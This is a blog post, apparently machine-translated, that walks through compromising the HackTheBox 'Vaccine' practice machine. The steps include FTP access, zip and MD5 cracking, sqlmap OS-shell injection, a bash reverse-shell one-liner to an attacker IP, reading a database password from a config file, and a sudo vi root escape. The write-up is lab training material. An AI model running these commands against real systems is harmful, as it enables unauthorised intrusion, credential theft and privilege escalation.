Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Vaccine] WriteUp

9
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The task involves exploiting a vulnerable web application on a HackTheBox challenge. The process begins with scanning for open ports (FTP, SSH, HTTP) and accessing the FTP service to download an encrypted backup.zip file. The password for the zip file is cracked using fcrackzip, revealing website source code that contains a username and an MD5 hashed password. The password is decrypted to "qwerty789." Logging into the website with these credentials reveals a SQL injection vulnerability. Using sqlmap, a shell is obtained through the injection. A reverse shell is established to gain access to the user "postgres." However, the password for the "postgres" user is unknown, preventing privilege escalation via sudo. By examining the website's configuration file, the database connection string is found, which includes the password "P@s5w0rd!" for the "postgres" user. Logging in via SSH with this password allows the user to execute a privileged command using vi to escalate privileges to root. Finally, the root flags are retrieved.

image

GetShell#

Scan the ports and find that services 21 FTP, 22 SSH, and 80 HTTP are open.

First, access FTP, where the anonymous user Anonymous can download a backup.zip. However, the zip is encrypted and needs to be cracked. Using fcrackzip can directly crack it, or you can escalate privileges to get the hash and then use hashcat to crack it.

brew install fcrackzip
fcrackzip -D -p top1000.txt backup.zip

Successfully cracked the password 741852963, opened the compressed file, and found the website source code, which contains the username and the MD5 encrypted password 2cb42f8734ea607eefed3b70af13bbd3. Check the CMD5, and find that the password is qwerty789.

Visit the website and log in successfully using the just found username and password, discovering an SQL injection: http://10.129.95.174/dashboard.php?search=a.

Throw it into sqlmap to directly get a shell.

sqlmap -u http://10.129.95.174/dashboard.php?search=a --cookie="PHPSESSID=79gpf5gqu90fnsjld3okq61vgd" --os-shell

Start nc locally to listen on a port.

nc -vl 9443

Execute the command in sqlmap's os-shell to reverse the shell.

bash -c "bash -i >& /dev/tcp/10.10.14.128/9443 0>&1"

Successfully obtained the shell of user postgres.

Privilege Escalation#

At this point, although the shell has been obtained, the password for user postgres is unknown, so sudo -l cannot be used to query the current user's privileged commands.

Check the website configuration file cat /var/www/html/dashboard.php to find the connection statement for the postgres database.

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

Log in to SSH with this username and password and find that the login is successful. Execute sudo -l and discover a privileged command.

/bin/vi /etc/postgresql/11/main/pg_hba.conf

Refer to the privilege escalation manual on GTFOBins and find that vi can be used for privilege escalation.

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell

Directly enter the root shell and obtain the root flag.

cat /var/lib/postgresql/user.txt
cat /root/root.txt
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.